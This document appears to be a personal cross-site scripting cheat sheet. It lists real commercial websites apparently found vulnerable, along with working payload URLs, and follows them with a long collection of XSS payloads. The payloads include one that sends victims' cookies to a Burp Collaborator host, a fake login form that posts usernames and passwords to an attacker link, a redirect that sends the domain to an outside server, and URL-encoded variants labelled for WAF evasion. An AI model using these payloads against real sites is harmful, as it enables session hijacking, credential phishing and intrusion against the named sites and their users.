XSS

Reflected
DOM Document object module
Stored
Self

Websites:
https://www.landroverusa.com/search.html?searchterm=%3Cimg+src%3Dx%C2%A0+onerror%3Dprompt%28document.cookie%29%3E&page=1
https://www.laughinghens.com/
http://hotvsnot.com/
https://www.baysider.com/

WAF
https://www.techtarget.com/whatis/search/query?q=nik
https://www.jaguar.com/search.html?searchterm=niks
https://prakle.com/en/redirect?redirectUrl=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Reflected:
</title><sCript>alert(1)</sCript>


Xss 

RXSS:
<img src=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx  onerror=prompt(document.cookie)>

GET VICTIM COOKIE:
<img src=x  onerror="document.location='http://9cmp1x831ockza76i2s489nd64cu0j.burpcollaborator.net?c='+document.cookie;" />

PHISHING:
<h3>Please login to proceed</h3> <form action=http://burplink>Username:<br><input type="username" name="username"></br>Password:<br><input type="password" name="password"></br><br><input type="submit" value="Login"></br>

<iframe src="javascript:alert(document.cookie)"></iframe>
<svg/onload=prompt(document.cookie);>
<svg onload=alert&#0000000040document.cookie)>
<svg+onload%3Dalert%26%230000000040document.cookie%29>

<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle="prompt(document.cookie);">

%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E



IFRAME

iframe injection payload
<iframe src="https://www.bing.com" height="100%" width="100%"></iframe>

Xss payload
Encoded Payload :
&#34;&gt;&lt;track/onerror=&#x27;confirm\%601\%60&#x27;&gt;

Clean Payload :
"><track/onerror='confirm`1`'>
XX"></SCRIPT><embed src=//14.rs>


"><SVG ONLOAD=&#97&#108&#101&#114&#116(&#x64&#x6f&#x63&#x75&#x6d&#x65&#x6e&#x74&#x2e&#x64&#x6f&#x6d&#x61&#x69&#x6e)>.asp

With URL encoding for WAF evasion: 
%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3d%26%23%39%37%26%23%31%30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%28%26%23%78%36%34%26%23%78%36%66%26%23%78%36%33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%23%78%36%65%26%23%78%37%34%26%23%78%32%65%26%23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%23%78%36%31%26%23%78%36%39%26%23%78%36%65%29%3e.asp

Encoded Payload 
&#34;&gt;&lt;track/onerror=&#x27;confirm\%601\%60&#x27;&gt;

Clean Payload 
"><track/onerror='confirm`1`'>

default script.
<script>alert(1)</script>

</title>"><img src=x onerror=alert();>
 
</title><script>alert(1234)</script>
</title><script>alert("OPEN BUG BOUNTY")</script>
</title><script>alert(document.cookie)</script>


if your input word appear in string (=) then first you need to close that string with symbol  ( > )then
you can use bydefault script


" /><script>alert(1)</script>
" /><script>alert("OPEN BUG BOUNTY")</script>
" /><script>alert(document.cookie)</script>

Dom Xss payload

// Img payload
<img src=x onerror=alert('XSS');>
<img src=x onerror=alert('XSS')//
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x onerror=alert('OPENBUGBOUNTY');>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>

// Svg payload
<svgonload=alert(1)>
<svg/onload=alert('XSS')>
<svg onload=alert(1)//
<svg/onload=alert(String.fromCharCode(88,83,83))>
<svg id=alert(1) onload=eval(id)>
"><svg/onload=alert(String.fromCharCode(88,83,83))>
"><svg/onload=alert(/XSS/)
<svg><script href=data:,alert(1) />(`Firefox` is the only browser which allows self closing script)
<svg><script>alert('33')
<svg><script>alert&lpar;'33'&rpar;

"><svg/onload=confirm(1)>"@x.y

javascript:alert(1)



x"><svG onLoad=prompt(9)>
<a href="javascript:alert(123)"onmouseover=alert("hello")>clickhere</a>

<script>window.location="http://www.tcs.com"</script>

"><IMG """><SCRIPT>alert(document.cookie)</SCRIPT>">
<xss onafterscriptexecute=alert(1)><script>1</script>
<style>@keyframes x{}</style><xss style="animation-name:x" onanimationend="alert(1)"></xss>
<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></xss>
<style>@keyframes x{}</style><xss style="animation-name:x" onanimationstart="alert(1)"></xss>
<xss onbeforescriptexecute=alert(1)><script>1</script>
<body onscroll=alert(1)><div style=height:1000px></div><div id=x></div>
<style>@keyframes x{}</style><xss style="animation-name:x" onwebkitanimationend="alert(1)"></xss>
<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onwebkitanimationiteration="alert(1)"></xss>
<style>:target {color:red;}</style><xss id=x style="transition:color 1s" onwebkittransitionend=alert(1)></xss>
<var onmouseover="prompt(1)">On Mouse Over</var>
<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
<input value=<><iframe/src=javascript:confirm(1)
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
<img src="/" =_=" title="onerror='prompt(1)'">
'><ScRiPt>alert(document.cookie)</script>
'><<script>alert(document.cookie);//<</script>
<script src="data:text/javascript,alert(1)"></script>
<iframe/src \/\/onload = prompt(1)
<iframe/onreadystatechange=alert(1)
<svg/onload=alert(1)
<svg/onload=location/**/='https://your.server/'+document.domain>
<svg><animate onbegin=alert() attributeName=x></svg>
<object data="data:text/html,<script>alert(5)</script>">
<iframe srcdoc="<svg onload=alert(4);>">
<object data=javascript:alert(3)>
<iframe src=javascript:alert(2)>
<embed src=javascript:alert(1)>
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+" type="image/svg+xml" AllowScriptAccess="always"></embed>
<embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="></embed>

